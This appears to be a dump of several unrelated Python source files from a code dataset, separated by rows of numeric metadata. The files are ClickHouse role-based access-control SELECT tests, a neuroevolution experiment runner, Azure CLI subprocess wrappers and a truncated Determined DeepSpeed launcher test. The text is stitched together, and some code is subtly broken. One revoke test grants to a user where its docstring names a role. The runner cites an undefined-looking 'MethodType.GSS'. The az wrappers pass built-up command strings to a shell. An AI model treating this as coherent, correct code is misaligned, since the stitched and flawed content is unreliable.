def user_with_revoked_privilege(self, table_type, node=None):
"""Check that user is unable to select from a table after select privilege
on that table has been revoked from the user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I grant privilege"):
node.query("GRANT SELECT ON merge_tree TO user0")
with And("I revoke privilege"):
node.query("REVOKE SELECT ON merge_tree FROM user0")
with And("I use SELECT, throws exception"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
def user_with_privilege_on_columns(self, table_type):
Scenario(run=user_column_privileges,
examples=Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass table_type",
[tuple(list(row)+[table_type]) for row in user_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_Column("1.0"),
)
@Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass", [
("d", "d", "x", "d", '\'2020-01-01\''),
("d,a", "d", "x", "d", '\'2020-01-01\''),
("d,a,b", "d,a,b", "x", "d,b", '\'2020-01-01\',9'),
("d,a,b", "b", "y", "d,a,b", '\'2020-01-01\',\'woo\',9')
])
def user_column_privileges(self, grant_columns, select_columns_pass, data_pass, table_type, revoke_columns=None, select_columns_fail=None, node=None):
"""Check that user is able to select on granted columns
and unable to select on not granted or revoked columns.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type), user(node, "user0"):
with Given("The table has some data on some columns"):
node.query(f"INSERT INTO merge_tree ({select_columns_pass}) VALUES ({data_pass})")
with When("I grant select privilege"):
node.query(f"GRANT SELECT({grant_columns}) ON merge_tree TO user0")
if select_columns_fail is not None:
with And("I select from not granted column"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"SELECT ({select_columns_fail}) FROM merge_tree",
settings = [("user","user0")], exitcode=exitcode, message=message)
with Then("I select from granted column, verify correct result"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output
if revoke_columns is not None:
with When("I revoke select privilege for columns from user"):
node.query(f"REVOKE SELECT({revoke_columns}) ON merge_tree FROM user0")
with And("I select from revoked columns"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"SELECT ({select_columns_pass}) FROM merge_tree", settings = [("user","user0")], exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_Grant("1.0"),
)
def role_with_privilege(self, table_type, node=None):
"""Check that user can select from a table after it is granted a role that
has the select privilege for that table.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with Given("I have some data inserted into table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
with user(node, "user0"):
with role(node, "role0"):
with When("I grant select privilege to a role"):
node.query("GRANT SELECT ON merge_tree TO role0")
with And("I grant role to the user"):
node.query("GRANT role0 TO user0")
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_Revoke("1.0"),
)
def role_with_revoked_privilege(self, table_type, node=None):
"""Check that user with a role that has select privilege on a table is unable
to select from that table after select privilege has been revoked from the role.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant privilege to a role"):
node.query("GRANT SELECT ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with And("I revoke privilege from the role"):
node.query("REVOKE SELECT ON merge_tree FROM role0")
with And("I select from the table"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
def user_with_revoked_role(self, table_type, node=None):
"""Check that user with a role that has select privilege on a table is unable to
select from that table after the role with select privilege has been revoked from the user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant privilege to a role"):
node.query("GRANT SELECT ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with And("I revoke the role from the user"):
node.query("REVOKE role0 FROM user0")
with And("I select from the table"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
def role_with_privilege_on_columns(self, table_type):
Scenario(run=role_column_privileges,
examples=Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass table_type",
[tuple(list(row)+[table_type]) for row in role_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_Column("1.0"),
)
@Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass", [
("d", "d", "x", "d", '\'2020-01-01\''),
("d,a", "d", "x", "d", '\'2020-01-01\''),
("d,a,b", "d,a,b", "x", "d,b", '\'2020-01-01\',9'),
("d,a,b", "b", "y", "d,a,b", '\'2020-01-01\',\'woo\',9')
])
def role_column_privileges(self, grant_columns, select_columns_pass, data_pass, table_type, revoke_columns=None, select_columns_fail=None, node=None):
"""Check that user is able to select from granted columns and unable
to select from not granted or revoked columns.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with Given("The table has some data on some columns"):
node.query(f"INSERT INTO merge_tree ({select_columns_pass}) VALUES ({data_pass})")
with user(node, "user0"), role(node, "role0"):
with When("I grant select privilege"):
node.query(f"GRANT SELECT({grant_columns}) ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
if select_columns_fail is not None:
with And("I select from not granted column"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"SELECT ({select_columns_fail}) FROM merge_tree",
settings = [("user","user0")], exitcode=exitcode, message=message)
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
if revoke_columns is not None:
with When("I revoke select privilege for columns from role"):
node.query(f"REVOKE SELECT({revoke_columns}) ON merge_tree FROM role0")
with And("I select from revoked columns"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"SELECT ({select_columns_pass}) FROM merge_tree",
settings = [("user","user0")], exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def user_with_privilege_on_cluster(self, table_type, node=None):
"""Check that user is able to select from a table with
privilege granted on a cluster.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
try:
with Given("I have some data inserted into table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
with Given("I have a user on a cluster"):
node.query("CREATE USER OR REPLACE user0 ON CLUSTER sharded_cluster")
with When("I grant select privilege on a cluster"):
node.query("GRANT ON CLUSTER sharded_cluster SELECT ON merge_tree TO user0")
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
finally:
with Finally("I drop the user"):
node.query("DROP USER user0 ON CLUSTER sharded_cluster")
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def user_with_privilege_from_user_with_grant_option(self, table_type, node=None):
"""Check that user is able to select from a table when granted privilege
from another user with grant option.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with Given("I have some data inserted into table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
with user(node, "user0"), user(node, "user1"):
with When("I grant privilege with grant option to user"):
node.query("GRANT SELECT ON merge_tree TO user0 WITH GRANT OPTION")
with And("I grant privilege to another user via grant option"):
node.query("GRANT SELECT ON merge_tree TO user1", settings = [("user","user0")])
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def role_with_privilege_from_user_with_grant_option(self, table_type, node=None):
"""Check that user is able to select from a table when granted a role with
select privilege that was granted by another user with grant option.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with Given("I have some data inserted into table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
with user(node, "user0"), user(node, "user1"), role(node, "role0"):
with When("I grant privilege with grant option to user"):
node.query("GRANT SELECT ON merge_tree TO user0 WITH GRANT OPTION")
with And("I grant privilege to a role via grant option"):
node.query("GRANT SELECT ON merge_tree TO role0", settings = [("user","user0")])
with And("I grant the role to another user"):
node.query("GRANT role0 TO user1")
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def user_with_privilege_from_role_with_grant_option(self, table_type, node=None):
"""Check that user is able to select from a table when granted privilege from
a role with grant option
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with Given("I have some data inserted into table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
with user(node, "user0"), user(node, "user1"), role(node, "role0"):
with When("I grant privilege with grant option to a role"):
node.query("GRANT SELECT ON merge_tree TO role0 WITH GRANT OPTION")
with When("I grant role to a user"):
node.query("GRANT role0 TO user0")
with And("I grant privilege to a user via grant option"):
node.query("GRANT SELECT ON merge_tree TO user1", settings = [("user","user0")])
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def role_with_privilege_from_role_with_grant_option(self, table_type, node=None):
"""Check that a user is able to select from a table with a role that was
granted privilege by another role with grant option
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with Given("I have some data inserted into table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
with user(node, "user0"), user(node, "user1"), role(node, "role0"), role(node, "role1"):
with When("I grant privilege with grant option to role"):
node.query("GRANT SELECT ON merge_tree TO role0 WITH GRANT OPTION")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with And("I grant privilege to another role via grant option"):
node.query("GRANT SELECT ON merge_tree TO role1", settings = [("user","user0")])
with And("I grant the second role to another user"):
node.query("GRANT role1 TO user1")
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_user_via_user_with_grant_option(self, table_type, node=None):
"""Check that user is unable to revoke a column they don't have access to from a user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), user(node, "user1"):
with When("I grant privilege with grant option to user"):
node.query("GRANT SELECT(d) ON merge_tree TO user0 WITH GRANT OPTION")
with Then("I revoke privilege on a column the user with grant option does not have access to"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("REVOKE SELECT(b) ON merge_tree FROM user1", settings=[("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_role_via_user_with_grant_option(self, table_type, node=None):
"""Check that user is unable to revoke a column they dont have acces to from a role.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant privilege with grant option to user"):
node.query("GRANT SELECT(d) ON merge_tree TO user0 WITH GRANT OPTION")
with Then("I revoke privilege on a column the user with grant option does not have access to"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("REVOKE SELECT(b) ON merge_tree FROM role0", settings=[("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_user_via_role_with_grant_option(self, table_type, node=None):
"""Check that user with a role is unable to revoke a column they dont have acces to from a user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), user(node,"user1"), role(node, "role0"):
with When("I grant privilege with grant option to a role"):
node.query("GRANT SELECT(d) ON merge_tree TO role0 WITH GRANT OPTION")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with Then("I revoke privilege on a column the user with grant option does not have access to"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("REVOKE SELECT(b) ON merge_tree FROM user1", settings=[("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_role_via_role_with_grant_option(self, table_type, node=None):
"""Check that user with a role is unable to revoke a column they dont have acces to from a role.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"), role(node, "role1"):
with When("I grant privilege with grant option to a role"):
node.query("GRANT SELECT(d) ON merge_tree TO user0 WITH GRANT OPTION")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with Then("I revoke privilege on a column the user with grant option does not have access to"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("REVOKE SELECT(b) ON merge_tree FROM role1", settings=[("user","user0")],
exitcode=exitcode, message=message)
@TestOutline(Feature)
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select("1.0"),
)
@Examples("table_type", [
(table_type, Requirements(requirement)) for table_type, requirement in list(table_requirements.items())
])
@Name("select")
def feature(self, table_type, node="clickhouse1"):
self.context.node = self.context.cluster.node(node)
Scenario(test=without_privilege)(table_type=table_type)
Scenario(test=user_with_privilege)(table_type=table_type)
Scenario(test=user_with_revoked_privilege)(table_type=table_type)
Scenario(test=user_with_privilege_on_columns)(table_type=table_type)
Scenario(test=role_with_privilege)(table_type=table_type)
Scenario(test=role_with_revoked_privilege)(table_type=table_type)
Scenario(test=user_with_revoked_role)(table_type=table_type)
Scenario(test=role_with_privilege_on_columns)(table_type=table_type)
Scenario(test=user_with_privilege_on_cluster)(table_type=table_type)
Scenario(test=user_with_privilege_from_user_with_grant_option)(table_type=table_type)
Scenario(test=role_with_privilege_from_user_with_grant_option)(table_type=table_type)
Scenario(test=user_with_privilege_from_role_with_grant_option)(table_type=table_type)
Scenario(test=role_with_privilege_from_role_with_grant_option)(table_type=table_type)
Scenario(test=revoke_privilege_from_user_via_user_with_grant_option)(table_type=table_type)
Scenario(test=revoke_privilege_from_role_via_user_with_grant_option)(table_type=table_type)
Scenario(test=revoke_privilege_from_user_via_role_with_grant_option)(table_type=table_type)
Scenario(test=revoke_privilege_from_role_via_role_with_grant_option)(table_type=table_type)
| 52.60757
| 311
| 0.653224
| 3,604
| 26,409
| 4.617925
| 0.048835
| 0.044343
| 0.036051
| 0.016584
| 0.879469
| 0.862765
| 0.840413
| 0.822868
| 0.80971
| 0.787418
| 0
| 0.020871
| 0.236169
| 26,409
| 502
| 312
| 52.60757
| 0.804184
| 0.071112
| 0
| 0.657343
| 0
| 0.016317
| 0.323186
| 0.017747
| 0
| 0
| 0
| 0
| 0.02331
| 1
| 0.053613
| false
| 0.025641
| 0.013986
| 0
| 0.067599
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a2d9df25d6bf2f171f7fd2837fcce9cc2bb551e8
| 7,428
|
py
|
Python
|
tasks/task_handler.py
|
HaolingZHANG/ReverseEncodingTree
|
16558ae18d71e7b1f089bfc6f4d819ad017d0f25
|
[
"Apache-2.0"
] | 14
|
2020-02-11T11:45:07.000Z
|
2022-03-10T23:47:45.000Z
|
tasks/task_handler.py
|
HaolingZHANG/ReverseEncodingTree
|
16558ae18d71e7b1f089bfc6f4d819ad017d0f25
|
[
"Apache-2.0"
] | 2
|
2020-02-02T10:49:51.000Z
|
2020-07-19T10:37:32.000Z
|
tasks/task_handler.py
|
HaolingZHANG/ReverseEncodingTree
|
16558ae18d71e7b1f089bfc6f4d819ad017d0f25
|
[
"Apache-2.0"
] | null | null | null |
from ReverseEncodingTree.evolution.bean.attacker import *
from ReverseEncodingTree.tasks.task_inform import *
def run_imply():
task = Logic(method_type=MethodType.N, logic_type=LogicType.IMPLY, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "IMPLY", MethodType.N)
task = Logic(method_type=MethodType.FS, logic_type=LogicType.IMPLY, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "IMPLY", MethodType.FS)
task = Logic(method_type=MethodType.BI, logic_type=LogicType.IMPLY, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "IMPLY", MethodType.BI)
task = Logic(method_type=MethodType.GS, logic_type=LogicType.IMPLY, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "IMPLY", MethodType.GS)
def run_nand():
task = Logic(method_type=MethodType.N, logic_type=LogicType.NAND, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NAND", MethodType.N)
task = Logic(method_type=MethodType.FS, logic_type=LogicType.NAND, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NAND", MethodType.FS)
task = Logic(method_type=MethodType.BI, logic_type=LogicType.NAND, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NAND", MethodType.BI)
task = Logic(method_type=MethodType.GS, logic_type=LogicType.NAND, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NAND", MethodType.GS)
def run_nor():
task = Logic(method_type=MethodType.N, logic_type=LogicType.NOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NOR", MethodType.N)
task = Logic(method_type=MethodType.FS, logic_type=LogicType.NOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NOR", MethodType.FS)
task = Logic(method_type=MethodType.BI, logic_type=LogicType.NOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NOR", MethodType.BI)
task = Logic(method_type=MethodType.GS, logic_type=LogicType.NOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "NOR", MethodType.GS)
def run_xor():
task = Logic(method_type=MethodType.N, logic_type=LogicType.XOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "XOR", MethodType.N)
task = Logic(method_type=MethodType.FS, logic_type=LogicType.XOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "XOR", MethodType.FS)
task = Logic(method_type=MethodType.BI, logic_type=LogicType.XOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "XOR", MethodType.BI)
task = Logic(method_type=MethodType.GS, logic_type=LogicType.XOR, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "XOR", MethodType.GS)
def run_cart_pole_v0():
task = Game(method_type=MethodType.N, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "CartPole_v0", MethodType.N)
task = Game(method_type=MethodType.FS, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "CartPole_v0", MethodType.FS)
task = Game(method_type=MethodType.BI, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "CartPole_v0", MethodType.BI)
task = Game(method_type=MethodType.GS, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "CartPole_v0", MethodType.GS)
def run_cart_pole_v0_with_attack():
attacker = CartPole_v0_Attacker(attack_type=AttackType.Gaussian, gaussian_peak=1000)
noise_level = 1
task = Game(method_type=MethodType.FS, game_type=GameType.CartPole_v0, episode_steps=500, episode_generation=20,
attacker=attacker, noise_level=noise_level, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "CartPole_v0", MethodType.FS)
task = Game(method_type=MethodType.BI, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
attacker=attacker, noise_level=noise_level, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "CartPole_v0", MethodType.BI)
task = Game(method_type=MethodType.GS, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
attacker=attacker, noise_level=noise_level, max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "CartPole_v0", MethodType.GSS)
def run_lunar_lander_v0():
task = Game(method_type=MethodType.N, game_type=GameType.LunarLander_v2, episode_steps=100, episode_generation=2,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "LunarLander_v2", MethodType.N)
task = Game(method_type=MethodType.FS, game_type=GameType.LunarLander_v2, episode_steps=100, episode_generation=2,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "LunarLander_v2", MethodType.FS)
task = Game(method_type=MethodType.BI, game_type=GameType.LunarLander_v2, episode_steps=100, episode_generation=2,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "LunarLander_v2", MethodType.BI)
task = Game(method_type=MethodType.GS, game_type=GameType.LunarLander_v2, episode_steps=100, episode_generation=2,
max_generation=500, display_results=False)
generations, counts = task.run(1000)
save_distribution(counts, "../output/", "LunarLander_v2", MethodType.GS)
| 53.438849
| 119
| 0.72469
| 917
| 7,428
| 5.645583
| 0.067612
| 0.052154
| 0.104308
| 0.119954
| 0.947074
| 0.947074
| 0.947074
| 0.940506
| 0.940506
| 0.917327
| 0
| 0.042934
| 0.150242
| 7,428
| 138
| 120
| 53.826087
| 0.77725
| 0
| 0
| 0.446602
| 0
| 0
| 0.063512
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0
| 0.019417
| 0
| 0.087379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a2e4a9132af3a8097c0204f77859b0f5de9f38b2
| 1,803
|
py
|
Python
|
test/pyaz/network/application_gateway/waf_config/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/network/application_gateway/waf_config/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/network/application_gateway/waf_config/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def set(resource_group, gateway_name, enabled, firewall_mode=None, rule_set_type=None, rule_set_version=None, disabled_rule_groups=None, disabled_rules=None, request_body_check=None, max_request_body_size=None, file_upload_limit=None, exclusion=None, no_wait=None):
params = get_params(locals())
command = "az network application-gateway waf-config set " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(resource_group, gateway_name):
params = get_params(locals())
command = "az network application-gateway waf-config show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_rule_sets(type=None, version=None, group=None):
params = get_params(locals())
command = "az network application-gateway waf-config list-rule-sets " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 39.195652
| 265
| 0.694953
| 232
| 1,803
| 5.275862
| 0.271552
| 0.068627
| 0.04902
| 0.051471
| 0.71732
| 0.71732
| 0.71732
| 0.71732
| 0.71732
| 0.71732
| 0
| 0.004127
| 0.193566
| 1,803
| 45
| 266
| 40.066667
| 0.837689
| 0
| 0
| 0.804878
| 0
| 0
| 0.099834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.04878
| 0
| 0.195122
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a7508d8d542ee7d8ebcacd1dd7261edfe36da576
| 9,803
|
py
|
Python
|
harness/tests/launch/test_autodeepspeed.py
|
prabhum456/determined
|
7e8017df0f62d80d21f5483578e2d5abd0e30935
|
[
"Apache-2.0"
] | null | null | null |
harness/tests/launch/test_autodeepspeed.py
|
prabhum456/determined
|
7e8017df0f62d80d21f5483578e2d5abd0e30935
|
[
"Apache-2.0"
] | null | null | null |
harness/tests/launch/test_autodeepspeed.py
|
prabhum456/determined
|
7e8017df0f62d80d21f5483578e2d5abd0e30935
|
[
"Apache-2.0"
] | null | null | null |
import contextlib
import os
import time
import unittest.mock as mock
from typing import Any, Iterator, List
import pytest
from deepspeed.launcher.runner import DEEPSPEED_ENVIRONMENT_NAME
import determined as det
from determined import constants
from determined.launch import autodeepspeed
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
@mock.patch("determined.util.check_sshd")
@mock.patch("time.time")
def test_launch_multi_slot_chief(
mock_time: mock.MagicMock,
mock_check_sshd: mock.MagicMock,
mock_cluster_info: mock.MagicMock,
mock_subprocess: mock.MagicMock,
) -> None:
cluster_info = make_mock_cluster_info(["0.0.0.0", "0.0.0.1"], 0)
mock_cluster_info.return_value = cluster_info
mock_start_time = time.time()
mock_time.return_value = mock_start_time
train_entrypoint = "model_def:TrialClass"
sshd_cmd = autodeepspeed.create_sshd_cmd()
pid_server_cmd = autodeepspeed.create_pid_server_cmd(
cluster_info.allocation_id, len(cluster_info.slot_ids)
)
deepspeed_cmd = autodeepspeed.create_run_command(
cluster_info.container_addrs[0], autodeepspeed.hostfile_path
)
pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
sshd_proc_mock = mock.MagicMock()
launch_proc_mock = mock.MagicMock()
def mock_process(cmd: List[str], *args: Any, **kwargs: Any) -> Any:
if cmd == sshd_cmd:
return sshd_proc_mock(*args, **kwargs)
if cmd == launch_cmd:
return launch_proc_mock(*args, **kwargs)
return None
mock_subprocess.side_effect = mock_process
with set_container_id_env_var():
autodeepspeed.main(train_entrypoint)
mock_cluster_info.assert_called_once()
assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
assert os.environ["USE_DEEPSPEED"] == "1"
assert os.environ["PDSH_SSH_ARGS"] == (
"-o PasswordAuthentication=no -o StrictHostKeyChecking=no "
f"-p {constants.DTRAIN_SSH_PORT} -2 -a -x %h"
)
mock_subprocess.assert_has_calls([mock.call(sshd_cmd), mock.call(launch_cmd)])
assert mock_check_sshd.call_count == len(cluster_info.container_addrs)
mock_check_sshd.assert_has_calls(
[
mock.call(addr, mock_start_time + 20, constants.DTRAIN_SSH_PORT)
for addr in cluster_info.container_addrs
]
)
launch_proc_mock().wait.assert_called_once()
sshd_proc_mock().kill.assert_called_once()
sshd_proc_mock().wait.assert_called_once()
# Cleanup deepspeed environment file created in autodeepspeed.main
deepspeed_env_path = os.path.join(os.getcwd(), DEEPSPEED_ENVIRONMENT_NAME)
if os.path.isfile(deepspeed_env_path):
os.remove(deepspeed_env_path)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
@mock.patch("determined.util.check_sshd")
@mock.patch("time.time")
def test_launch_multi_slot_fail(
mock_time: mock.MagicMock,
mock_check_sshd: mock.MagicMock,
mock_cluster_info: mock.MagicMock,
mock_subprocess: mock.MagicMock,
) -> None:
